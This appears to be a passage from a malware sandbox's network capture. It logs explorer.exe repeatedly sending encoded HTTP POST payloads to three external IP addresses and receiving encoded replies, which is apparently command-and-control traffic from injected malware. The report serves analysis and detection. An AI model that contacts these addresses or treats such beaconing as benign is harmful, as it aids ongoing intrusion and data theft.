2024-07-27 06:55:48 UTC	685	IN	Data Raw: 50 32 59 4e 34 52 41 59 6f 52 68 4c 77 46 79 2b 58 4e 4e 56 32 61 43 53 53 6c 52 79 6a 74 64 2b 44 79 71 5a 5a 37 31 4f 4c 69 56 33 4a 38 59 66 63 36 42 64 33 6d 57 72 32 6b 73 53 55 71 72 50 50 48 36 73 66 76 71 63 55 76 46 73 75 2f 36 72 61 2b 47 39 5a 6d 66 69 75 52 42 7a 4b 71 6b 48 6e 4c 6b 4a 6f 38 35 4d 43 70 65 47 39 75 42 33 6b 48 30 30 39 58 43 62 77 68 78 6e 57 5a 51 34 46 73 66 75 30 42 4b 7a 35 2f 63 7a 2f 45 75 34 64 69 45 63 37 55 67 46 48 4b 32 4c 4f 4b 4a 67 4e 6d 34 32 33 69 64 42 6d 6f 32 45 43 34 5a 72 52 45 71 50 32 47 41 4e 36 61 5a 50 53 78 7a 38 38 38 75 39 35 64 6d 45 72 58 30 64 54 55 45 74 37 77 78 48 70 77 74 49 44 48 2f 43 2b 2f 67 35 39 53 41 62 30 38 4d 65 31 37 78 7a 6e 56 6c 34 6f 50 34 4a 4a 5a 42 38 47 51 41 41 44 78 45 Data Ascii: P2YN4RAYoRhLwFy+XNNV2aCSSlRyjtd+DyqZZ71OLiV3J8Yfc6Bd3mWr2ksSUqrPPH6sfvqcUvFsu/6ra+G9ZmfiuRBzKqkHnLkJo85MCpeG9uB3kH009XCbwhxnWZQ4Fsfu0BKz5/cz/Eu4diEc7UgFHK2LOKJgNm423idBmo2EC4ZrREqP2GAN6aZPSxz888u95dmErX0dTUEt7wxHpwtIDH/C+/g59SAb08Me17xznVl4oP4JJZB8GQAADxE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	50795	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:49 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:49 UTC	1122	OUT	Data Raw: 67 6e 71 52 45 62 4e 50 71 52 36 67 69 31 51 48 42 62 64 6f 49 6c 61 73 72 38 69 4d 59 44 35 4b 4e 42 2b 64 49 7a 4f 6e 6c 56 44 6a 76 37 66 63 31 4a 56 59 44 55 63 37 36 79 33 42 44 52 46 78 6a 72 45 65 74 4d 55 56 2f 69 76 4b 48 4e 57 67 47 4d 72 51 35 6c 4c 53 4f 53 6d 6f 44 57 57 4c 61 33 4f 57 75 36 2f 56 69 59 6c 67 39 4c 38 4d 38 54 63 6e 73 6c 6d 61 65 4e 63 51 43 62 53 30 77 2f 45 58 43 36 39 56 45 6b 64 6e 57 58 32 50 2b 54 4f 77 75 4b 42 2b 42 74 57 45 5a 78 6a 45 63 75 35 75 74 4e 76 72 63 58 59 54 66 71 69 32 79 30 2f 58 67 55 4a 79 6d 6e 6e 4b 69 57 37 44 69 39 72 72 37 4a 4a 6a 58 34 4a 6c 48 32 63 2b 37 4d 6e 5a 48 79 53 50 49 6e 72 49 4a 44 54 58 6d 4a 54 39 39 32 69 77 6e 6b 76 44 64 76 74 34 56 51 38 4e 6d 30 59 47 66 35 62 7a 6a 41 50 Data Ascii: gnqREbNPqR6gi1QHBbdoIlasr8iMYD5KNB+dIzOnlVDjv7fc1JVYDUc76y3BDRFxjrEetMUV/ivKHNWgGMrQ5lLSOSmoDWWLa3OWu6/ViYlg9L8M8TcnslmaeNcQCbS0w/EXC69VEkdnWX2P+TOwuKB+BtWEZxjEcu5utNvrcXYTfqi2y0/XgUJymnnKiW7Di9rr7JJjX4JlH2c+7MnZHySPInrIJDTXmJT992iwnkvDdvt4VQ8Nm0YGf5bzjAP
2024-07-27 06:55:50 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:50 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:50 UTC	685	IN	Data Raw: 4f 54 2f 68 44 4f 4b 6a 62 71 76 6d 56 72 41 43 44 6b 42 34 7a 46 4a 30 68 59 54 57 50 77 70 59 45 37 6c 61 31 6c 6a 47 2f 79 73 42 44 6f 73 43 66 54 4b 4a 78 64 43 4d 54 64 58 6d 63 54 39 33 44 6f 79 4e 5a 62 67 73 5a 72 66 74 41 72 69 66 4b 71 62 41 58 6c 74 50 62 6e 46 68 77 2b 46 30 7a 52 46 79 75 38 6d 53 63 6d 59 45 6c 6d 56 6c 61 38 49 43 69 59 4f 6c 6e 34 79 75 52 2f 58 53 77 54 65 53 41 4a 62 52 79 31 53 79 46 65 2f 2b 55 4a 6b 62 6a 4d 38 2b 71 61 62 54 6d 6c 4f 45 5a 67 67 4b 41 75 5a 73 47 50 6d 5a 6f 76 49 74 72 66 64 6b 4b 62 2b 4e 51 6a 51 37 53 58 56 68 6f 70 64 43 39 52 59 4e 6f 65 34 6f 76 32 6f 4d 34 7a 6b 63 72 59 66 7a 30 55 53 79 43 38 63 44 30 65 31 78 73 73 6e 30 6b 70 55 32 62 30 6e 53 6f 30 46 70 76 6e 37 4c 52 62 32 33 31 35 33 Data Ascii: OT/hDOKjbqvmVrACDkB4zFJ0hYTWPwpYE7la1ljG/ysBDosCfTKJxdCMTdXmcT93DoyNZbgsZrftArifKqbAXltPbnFhw+F0zRFyu8mScmYElmVla8ICiYOln4yuR/XSwTeSAJbRy1SyFe/+UJkbjM8+qabTmlOEZggKAuZsGPmZovItrfdkKb+NQjQ7SXVhopdC9RYNoe4ov2oM4zkcrYfz0USyC8cD0e1xssn0kpU2b0nSo0Fpvn7LRb23153

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50796	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:51 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:51 UTC	1122	OUT	Data Raw: 52 49 79 31 39 53 63 4b 52 76 50 47 30 34 55 70 38 2b 68 55 53 7a 47 6d 6c 57 42 6d 54 66 66 48 30 36 37 63 76 4f 65 39 49 2b 59 56 59 64 4c 33 62 48 76 71 34 55 34 6c 65 70 69 6f 44 44 41 37 4f 76 4f 35 51 37 71 77 65 71 36 59 70 77 73 71 4b 7a 7a 4f 69 66 2f 64 58 68 75 4b 31 42 36 30 56 35 71 45 39 79 2f 42 35 75 31 52 6c 7a 4d 44 49 6d 53 35 50 78 4b 64 4a 54 46 64 4e 4d 49 63 4b 6c 69 6b 34 48 34 30 35 56 48 66 65 55 68 63 6a 70 75 45 2b 59 30 6c 6e 31 65 6a 48 70 52 4f 67 31 65 33 59 58 6b 64 72 6b 4c 75 62 76 32 36 2f 4d 68 2f 54 55 45 78 47 54 37 52 76 4b 39 41 55 57 68 39 77 57 43 4b 6c 2f 4f 33 62 6c 59 33 45 56 45 52 4b 2f 4f 67 71 78 6a 66 55 7a 6a 66 38 48 73 68 38 61 44 35 33 45 69 46 71 76 4a 68 61 57 73 6e 72 36 59 30 4c 2b 65 69 2f 36 2b Data Ascii: RIy19ScKRvPG04Up8+hUSzGmlWBmTffH067cvOe9I+YVYdL3bHvq4U4lepioDDA7OvO5Q7qweq6YpwsqKzzOif/dXhuK1B60V5qE9y/B5u1RlzMDImS5PxKdJTFdNMIcKlik4H405VHfeUhcjpuE+Y0ln1ejHpROg1e3YXkdrkLubv26/Mh/TUExGT7RvK9AUWh9wWCKl/O3blY3EVERK/OgqxjfUzjf8Hsh8aD53EiFqvJhaWsnr6Y0L+ei/6+
2024-07-27 06:55:52 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:52 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:52 UTC	685	IN	Data Raw: 53 45 75 6b 67 63 36 46 41 58 6a 36 77 35 78 35 66 31 62 71 68 43 66 77 6a 78 6d 6b 6b 68 42 34 35 34 39 32 62 62 52 50 38 6a 6a 57 6c 53 6d 61 64 75 30 79 6a 6b 33 2f 77 4c 63 6d 49 68 74 65 43 6b 4a 73 6b 4b 39 6f 4c 36 47 72 47 36 4e 6a 56 66 6a 32 51 55 4a 35 70 55 48 69 63 48 56 54 39 2f 72 45 65 4c 30 68 37 70 54 79 55 46 74 41 52 73 4a 6a 39 79 52 56 4f 72 6b 4c 36 44 67 59 69 6e 62 55 7a 46 5a 4b 65 64 5a 47 2b 6b 32 31 51 76 79 2b 7a 52 63 6b 73 37 6e 45 35 35 73 54 4a 6c 70 6c 46 75 4a 2f 53 44 47 74 71 67 7a 45 66 33 36 4e 78 72 52 37 5a 78 2f 2b 61 6f 69 74 4f 52 6c 47 47 53 79 41 45 4f 6a 45 34 7a 37 54 38 59 62 35 63 47 42 59 66 73 62 44 57 7a 38 38 42 47 56 2b 4b 6d 77 4c 44 70 77 76 31 51 74 54 33 6e 7a 34 41 64 6f 69 64 6c 6c 33 4b 6c 69 Data Ascii: SEukgc6FAXj6w5x5f1bqhCfwjxmkkhB45492bbRP8jjWlSmadu0yjk3/wLcmIhteCkJskK9oL6GrG6NjVfj2QUJ5pUHicHVT9/rEeL0h7pTyUFtARsJj9yRVOrkL6DgYinbUzFZKedZG+k21Qvy+zRcks7nE55sTJlplFuJ/SDGtqgzEf36NxrR7Zx/+aoitORlGGSyAEOjE4z7T8Yb5cGBYfsbDWz88BGV+KmwLDpwv1QtT3nz4Adoidll3Kli

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50797	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:53 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:53 UTC	1122	OUT	Data Raw: 51 2b 54 41 31 2b 68 38 64 59 57 45 54 33 50 6f 42 50 42 7a 45 61 77 38 45 63 6b 7a 75 67 64 45 75 2f 38 71 6e 42 43 6d 2b 58 72 6f 30 76 78 54 49 73 35 32 73 47 2b 5a 5a 66 4a 68 63 69 55 64 41 62 5a 68 64 58 72 36 68 74 73 4a 4c 53 43 74 72 4e 51 75 54 57 7a 2b 2f 69 57 57 69 4e 2b 6c 45 2b 59 64 30 59 48 31 4d 51 50 4d 54 42 4c 76 7a 58 31 4d 56 36 74 43 68 38 43 4f 74 63 6a 74 4e 59 34 48 36 4d 4c 62 2f 2f 45 73 6b 63 42 4a 69 74 2b 44 50 48 7a 68 51 6c 74 47 4f 52 75 78 6b 35 6b 31 41 39 52 33 4f 6d 48 34 6a 79 74 58 65 32 2f 54 75 42 4c 44 2b 43 4c 63 52 77 2b 56 77 77 37 68 38 36 36 57 64 6f 52 65 62 79 6a 6e 43 79 4d 36 78 68 55 7a 6a 45 42 31 5a 46 73 62 6b 6e 72 31 53 67 32 6a 72 46 32 79 61 73 4d 78 73 2b 48 55 41 4b 34 34 52 38 62 7a 33 71 49 Data Ascii: Q+TA1+h8dYWET3PoBPBzEaw8EckzugdEu/8qnBCm+Xro0vxTIs52sG+ZZfJhciUdAbZhdXr6htsJLSCtrNQuTWz+/iWWiN+lE+Yd0YH1MQPMTBLvzX1MV6tCh8COtcjtNY4H6MLb//EskcBJit+DPHzhQltGORuxk5k1A9R3OmH4jytXe2/TuBLD+CLcRw+Vww7h866WdoRebyjnCyM6xhUzjEB1ZFsbknr1Sg2jrF2yasMxs+HUAK44R8bz3qI
2024-07-27 06:55:54 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:54 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:54 UTC	685	IN	Data Raw: 31 71 4a 4d 78 30 2f 45 62 62 73 64 65 57 77 35 79 4c 65 2b 43 32 31 6c 75 76 33 64 66 48 2f 45 2f 67 47 59 39 30 49 34 51 4c 30 6e 36 58 2f 42 58 6b 41 78 47 64 57 6d 36 77 68 35 55 4e 62 6b 6b 35 6e 66 73 53 4d 6d 6a 6b 58 65 65 53 54 6b 78 53 30 69 53 4a 72 54 77 39 66 4b 47 56 74 6d 49 79 43 62 61 30 31 52 72 34 55 59 79 31 6e 57 6c 39 55 75 49 36 59 51 43 44 46 4a 63 67 4a 4e 53 50 75 63 4d 56 72 43 75 66 65 49 72 43 5a 62 65 44 68 37 67 38 34 4b 4e 55 30 2f 4d 63 53 51 44 6c 4c 53 67 33 59 6a 4f 6d 4d 6e 56 45 35 4d 6d 38 75 4e 6d 56 59 62 70 6d 74 50 2f 31 59 67 4b 36 44 57 6c 4e 63 49 59 6a 30 39 6b 69 61 58 2f 69 55 5a 67 74 52 63 76 4e 78 5a 7a 2b 36 43 44 35 66 31 6c 45 51 37 41 66 34 54 42 43 59 50 75 41 6a 48 35 74 62 6b 2f 78 61 55 6e 56 71 Data Ascii: 1qJMx0/EbbsdeWw5yLe+C21luv3dfH/E/gGY90I4QL0n6X/BXkAxGdWm6wh5UNbkk5nfsSMmjkXeeSTkxS0iSJrTw9fKGVtmIyCba01Rr4UYy1nWl9UuI6YQCDFJcgJNSPucMVrCufeIrCZbeDh7g84KNU0/McSQDlLSg3YjOmMnVE5Mm8uNmVYbpmtP/1YgK6DWlNcIYj09kiaX/iUZgtRcvNxZz+6CD5f1lEQ7Af4TBCYPuAjH5tbk/xaUnVq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50798	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:55 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:55 UTC	1122	OUT	Data Raw: 6c 36 76 46 4b 4f 73 53 2b 6b 2b 4d 35 68 53 46 44 50 37 44 42 73 2f 54 48 77 41 35 66 42 6a 54 65 43 6a 37 53 6d 2f 41 61 59 4d 4b 4b 37 31 6a 35 6a 7a 47 74 45 4d 32 4b 59 76 39 45 51 36 77 45 53 5a 67 79 6f 45 51 50 30 58 6a 75 35 65 32 70 67 30 4a 39 31 47 30 4b 65 50 4a 56 49 58 4d 36 4e 4e 54 46 75 66 68 32 76 64 66 74 61 64 75 50 45 69 78 4d 4b 69 7a 6c 44 61 6a 61 4c 64 61 4e 69 31 54 33 53 4d 31 4c 34 64 47 6f 50 2f 56 51 33 48 46 52 4d 2b 70 54 73 69 6b 45 38 66 2f 39 77 76 5a 4e 69 55 72 2b 74 56 65 43 73 57 36 59 31 7a 2f 57 6c 63 58 54 4f 4a 2b 54 33 4b 6f 35 34 54 7a 68 37 6c 45 73 65 6d 39 59 43 62 72 74 56 33 79 30 68 61 54 49 4e 73 51 57 79 6d 55 53 52 66 4b 4b 45 4e 36 68 42 5a 72 35 67 41 33 75 4e 35 69 32 35 57 35 62 62 45 55 39 75 57 Data Ascii: l6vFKOsS+k+M5hSFDP7DBs/THwA5fBjTeCj7Sm/AaYMKK71j5jzGtEM2KYv9EQ6wESZgyoEQP0Xju5e2pg0J91G0KePJVIXM6NNTFufh2vdftaduPEixMKizlDajaLdaNi1T3SM1L4dGoP/VQ3HFRM+pTsikE8f/9wvZNiUr+tVeCsW6Y1z/WlcXTOJ+T3Ko54Tzh7lEsem9YCbrtV3y0haTINsQWymUSRfKKEN6hBZr5gA3uN5i25W5bbEU9uW
2024-07-27 06:55:56 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:56 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:56 UTC	685	IN	Data Raw: 41 53 6f 61 6c 47 57 78 52 4e 35 55 64 43 6c 30 39 56 4e 33 4d 74 74 67 61 4f 71 34 34 31 32 4e 6d 6e 58 63 62 72 41 34 49 47 34 6a 4b 44 48 33 56 39 54 71 4f 5a 4d 4c 6b 54 74 56 50 7a 79 38 58 7a 43 6c 6b 74 5a 70 6e 64 75 67 34 55 38 78 4f 59 4c 73 4a 6d 43 74 4c 32 70 4a 4d 2f 2b 48 67 6b 6b 6d 56 4b 32 32 56 52 35 38 7a 6f 46 79 4b 5a 47 30 64 63 76 41 6f 71 62 65 43 42 66 4b 55 50 4a 71 62 6f 33 4d 4a 75 76 42 6c 67 76 46 57 43 37 53 74 31 64 62 59 51 78 63 77 66 67 71 70 32 38 48 67 78 4f 56 7a 6c 70 53 62 62 54 4a 4a 6a 4c 7a 6d 45 6b 70 79 34 31 5a 61 51 78 6d 70 7a 6a 47 61 63 6f 66 79 7a 4c 65 54 32 50 4b 35 38 2f 77 77 64 49 54 45 5a 33 49 36 35 73 33 79 41 42 55 67 7a 72 49 69 62 31 2b 4f 36 43 4e 58 36 6e 74 53 4f 4b 62 38 52 73 5a 39 51 38 Data Ascii: ASoalGWxRN5UdCl09VN3MttgaOq4412NmnXcbrA4IG4jKDH3V9TqOZMLkTtVPzy8XzClktZpndug4U8xOYLsJmCtL2pJM/+HgkkmVK22VR58zoFyKZG0dcvAoqbeCBfKUPJqbo3MJuvBlgvFWC7St1dbYQxcwfgqp28HgxOVzlpSbbTJJjLzmEkpy41ZaQxmpzjGacofyzLeT2PK58/wwdITEZ3I65s3yABUgzrIib1+O6CNX6ntSOKb8RsZ9Q8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50799	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:57 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:57 UTC	1122	OUT	Data Raw: 6d 76 67 72 6f 45 48 39 79 75 43 75 59 58 62 6f 71 42 54 72 61 65 58 41 66 2f 6f 56 6b 55 46 4d 55 4f 49 4b 4b 30 69 34 69 35 45 65 65 6e 69 31 79 5a 30 6a 73 31 6b 77 56 4c 35 72 2b 44 54 37 72 58 36 4c 57 65 33 61 4b 31 78 73 50 47 49 4c 66 38 77 76 4d 63 2f 43 45 50 35 46 77 6e 30 53 2f 44 47 43 73 4c 6c 49 58 42 55 76 61 76 6e 63 50 76 4c 48 79 2b 69 7a 6f 71 6f 79 74 70 4b 43 4e 6d 66 44 6c 49 65 6b 39 52 61 56 6b 50 44 52 6f 70 75 38 74 64 74 71 6f 42 41 45 41 67 50 41 56 30 69 72 62 63 5a 36 58 41 45 53 4c 59 50 4d 53 2f 71 6d 73 55 6b 42 58 61 78 30 6c 57 66 34 30 67 55 41 6d 57 35 52 36 47 67 70 73 30 66 31 42 4c 51 4f 4f 33 6a 53 36 4a 4c 78 63 66 5a 5a 53 78 72 41 5a 5a 62 63 7a 69 63 57 46 4c 41 30 6f 63 49 2b 35 69 6c 75 63 76 33 41 67 32 65 Data Ascii: mvgroEH9yuCuYXboqBTraeXAf/oVkUFMUOIKK0i4i5Eeeni1yZ0js1kwVL5r+DT7rX6LWe3aK1xsPGILf8wvMc/CEP5Fwn0S/DGCsLlIXBUvavncPvLHy+izoqoytpKCNmfDlIek9RaVkPDRopu8tdtqoBAEAgPAV0irbcZ6XAESLYPMS/qmsUkBXax0lWf40gUAmW5R6Ggps0f1BLQOO3jS6JLxcfZZSxrAZZbczicWFLA0ocI+5ilucv3Ag2e
2024-07-27 06:55:58 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:58 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:58 UTC	685	IN	Data Raw: 49 64 72 53 71 55 52 38 79 51 45 31 67 58 67 4c 2f 7a 58 43 75 46 52 4e 45 78 6e 35 38 6d 4e 31 66 38 66 76 6f 70 46 33 2b 50 62 71 43 53 34 78 56 39 46 62 6c 62 48 37 66 46 4e 48 2f 35 30 6a 57 41 5a 58 4a 42 66 7a 6a 41 42 42 66 4b 34 37 6a 4c 41 77 34 42 34 72 74 72 42 2b 34 4b 2b 34 53 54 6d 33 70 32 48 61 46 6f 51 74 30 61 45 5a 38 5a 45 46 31 41 2f 31 4e 70 63 55 45 61 51 31 6a 41 69 31 45 4e 68 63 44 46 65 56 43 39 52 74 45 71 2b 52 62 31 4e 4b 36 53 58 54 6d 64 59 62 54 4d 77 36 30 54 4f 78 77 76 6a 36 7a 4a 6b 38 39 39 58 52 57 56 75 6c 75 2b 59 78 75 45 68 55 65 72 76 5a 4f 75 72 38 63 33 43 6e 54 71 75 6e 53 65 7a 74 50 43 67 42 2f 6f 6f 32 57 78 45 4c 49 6d 74 63 4e 49 39 74 77 45 32 79 32 6e 6c 36 63 4e 46 58 56 70 6c 70 51 42 74 59 70 50 47 Data Ascii: IdrSqUR8yQE1gXgL/zXCuFRNExn58mN1f8fvopF3+PbqCS4xV9FblbH7fFNH/50jWAZXJBfzjABBfK47jLAw4B4rtrB+4K+4STm3p2HaFoQt0aEZ8ZEF1A/1NpcUEaQ1jAi1ENhcDFeVC9RtEq+Rb1NK6SXTmdYbTMw60TOxwvj6zJk899XRWVulu+YxuEhUervZOur8c3CnTqunSeztPCgB/oo2WxELImtcNI9twE2y2nl6cNFXVplpQBtYpPG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50801	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:59 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:59 UTC	1122	OUT	Data Raw: 43 4d 72 33 34 6f 72 4c 71 72 6e 4e 71 62 42 65 63 54 76 68 55 50 58 53 57 71 75 51 6c 61 75 68 6d 53 38 69 30 4f 37 47 6c 31 36 6b 2f 37 2b 2f 45 33 57 73 4a 46 50 76 6b 65 35 42 49 58 63 34 59 64 76 76 78 32 4f 33 50 68 5a 37 34 47 41 51 35 30 68 4c 30 37 56 33 64 6b 39 45 6b 58 6d 55 54 51 31 45 78 54 6e 51 74 78 37 2f 73 2b 4e 55 6e 56 43 38 73 31 41 58 2f 47 6c 55 6e 45 36 53 76 64 4e 67 36 6c 6f 36 58 6b 31 53 49 47 65 7a 65 74 7a 78 76 32 49 33 41 61 75 6c 65 48 71 71 6a 69 44 38 36 6d 46 49 5a 64 62 65 43 74 49 4e 4c 58 44 36 6d 70 50 39 6c 6f 6c 55 43 78 43 62 76 49 65 75 34 34 43 41 7a 38 43 74 47 6b 36 7a 79 36 52 39 58 62 2f 4f 72 65 48 50 55 31 53 4d 35 55 46 76 46 77 66 66 77 38 35 77 76 77 64 5a 70 30 72 75 7a 7a 30 78 67 38 36 6c 4e 45 69 Data Ascii: CMr34orLqrnNqbBecTvhUPXSWquQlauhmS8i0O7Gl16k/7+/E3WsJFPvke5BIXc4Ydvvx2O3PhZ74GAQ50hL07V3dk9EkXmUTQ1ExTnQtx7/s+NUnVC8s1AX/GlUnE6SvdNg6lo6Xk1SIGezetzxv2I3AauleHqqjiD86mFIZdbeCtINLXD6mpP9lolUCxCbvIeu44CAz8CtGk6zy6R9Xb/OreHPU1SM5UFvFwffw85wvwdZp0ruzz0xg86lNEi
2024-07-27 06:56:01 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:01 UTC	685	IN	Data Raw: 56 54 66 39 6c 44 5a 6d 75 32 55 4a 6b 66 53 75 52 70 6a 2f 59 51 65 70 75 79 67 67 51 2b 61 32 54 4a 37 6a 71 30 7a 4b 6c 70 75 4c 73 49 31 51 41 6c 4b 7a 5a 4d 78 64 2b 49 4e 36 6a 45 4c 73 4c 68 79 6a 68 6d 6e 4d 70 68 6f 75 6d 57 4c 34 65 78 31 57 55 67 6d 48 42 36 45 78 6c 6c 49 45 63 59 49 56 2f 50 69 72 69 32 46 4e 73 69 50 39 63 48 78 50 6f 57 47 33 62 2b 4e 55 74 44 68 56 4d 35 53 37 31 53 6e 6b 4c 38 79 71 6b 38 58 6e 33 70 42 4f 42 6a 70 47 76 49 70 67 41 49 48 68 45 48 74 55 48 4d 30 69 64 35 69 71 62 31 30 48 53 46 45 74 55 55 2f 39 42 2b 53 79 71 67 31 48 65 4f 52 78 4b 4e 4d 53 71 55 61 6c 2f 73 50 4a 2b 30 62 31 45 5a 64 53 74 4c 4f 6e 46 43 50 76 71 4c 78 4a 62 51 45 7a 33 70 68 32 45 45 76 69 4b 74 33 69 62 47 45 6a 44 56 4a 4c 65 36 6a Data Ascii: VTf9lDZmu2UJkfSuRpj/YQepuyggQ+a2TJ7jq0zKlpuLsI1QAlKzZMxd+IN6jELsLhyjhmnMphoumWL4ex1WUgmHB6ExllIEcYIV/Piri2FNsiP9cHxPoWG3b+NUtDhVM5S71SnkL8yqk8Xn3pBOBjpGvIpgAIHhEHtUHM0id5iqb10HSFEtUU/9B+Syqg1HeORxKNMSqUal/sPJ+0b1EZdStLOnFCPvqLxJbQEz3ph2EEviKt3ibGEjDVJLe6j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50802	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:01 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:56:01 UTC	1267	OUT	Data Raw: 4e 44 55 4c 65 52 2b 42 6c 56 6f 78 2f 6e 71 2b 70 36 70 33 4c 72 76 49 70 73 62 76 66 78 46 4f 34 38 63 74 75 52 34 71 75 45 43 70 56 78 71 64 64 4d 39 6b 68 46 53 79 35 70 49 30 70 34 4d 50 75 6c 71 6d 37 61 71 77 69 76 73 66 72 7a 38 38 46 30 58 79 35 45 50 70 45 56 35 50 6f 4c 58 32 41 33 59 76 7a 31 50 74 36 52 73 4f 6f 43 63 65 34 71 76 31 67 37 7a 35 6a 62 77 77 62 51 7a 43 6d 42 76 4e 69 6d 45 62 38 31 32 6d 30 58 66 4c 44 61 77 4f 63 4a 49 39 58 67 4c 35 2f 70 39 39 36 55 38 47 54 36 57 33 57 6b 35 7a 48 79 4c 4b 6b 4a 46 38 54 41 47 69 4a 50 6d 58 6e 43 35 50 6d 37 56 73 2f 34 50 76 76 7a 53 6a 34 6f 55 46 73 2b 57 4f 6b 49 38 6d 4d 53 72 66 4c 6a 41 37 62 42 44 62 64 37 4b 35 77 39 5a 66 6a 34 6e 48 72 45 46 35 72 59 65 35 36 46 62 66 6a 33 58 Data Ascii: NDULeR+BlVox/nq+p6p3LrvIpsbvfxFO48ctuR4quECpVxqddM9khFSy5pI0p4MPulqm7aqwivsfrz88F0Xy5EPpEV5PoLX2A3Yvz1Pt6RsOoCce4qv1g7z5jbwwbQzCmBvNimEb812m0XfLDawOcJI9XgL5/p996U8GT6W3Wk5zHyLKkJF8TAGiJPmXnC5Pm7Vs/4PvvzSj4oUFs+WOkI8mMSrfLjA7bBDbd7K5w9Zfj4nHrEF5rYe56Fbfj3X
2024-07-27 06:56:03 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:02 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:03 UTC	685	IN	Data Raw: 43 2f 39 6b 4f 6f 34 74 31 63 4f 6c 5a 48 65 68 64 72 49 53 61 75 68 65 38 73 44 63 70 74 7a 6e 4b 46 4a 51 5a 52 58 43 47 79 78 45 74 6f 41 74 71 2f 73 6b 31 74 33 5a 4d 48 57 73 63 45 5a 70 77 6a 33 42 6d 38 59 72 2f 55 78 33 4e 2f 74 32 4d 33 48 55 4f 6c 45 52 4f 67 51 77 68 6f 6d 77 33 39 63 54 4d 55 47 36 42 33 51 51 30 71 6f 6d 6e 47 43 33 32 6f 6c 36 64 54 44 34 37 69 49 71 6a 34 62 6d 4a 39 76 36 56 4f 6e 42 53 4a 2b 63 6d 30 65 59 76 33 4e 6f 4f 4a 63 66 76 2f 2f 6a 72 67 43 73 72 61 34 64 77 36 71 58 4b 71 62 2f 73 54 64 72 6c 50 50 48 70 75 34 44 68 46 4a 77 53 43 61 63 65 57 70 49 79 56 68 33 32 34 39 78 4d 57 38 77 5a 35 51 36 38 55 46 46 45 72 70 6d 4f 72 43 71 67 50 74 56 77 6e 76 77 6a 76 36 49 4b 71 57 30 4e 31 6d 46 44 43 48 4a 31 6f 37 Data Ascii: 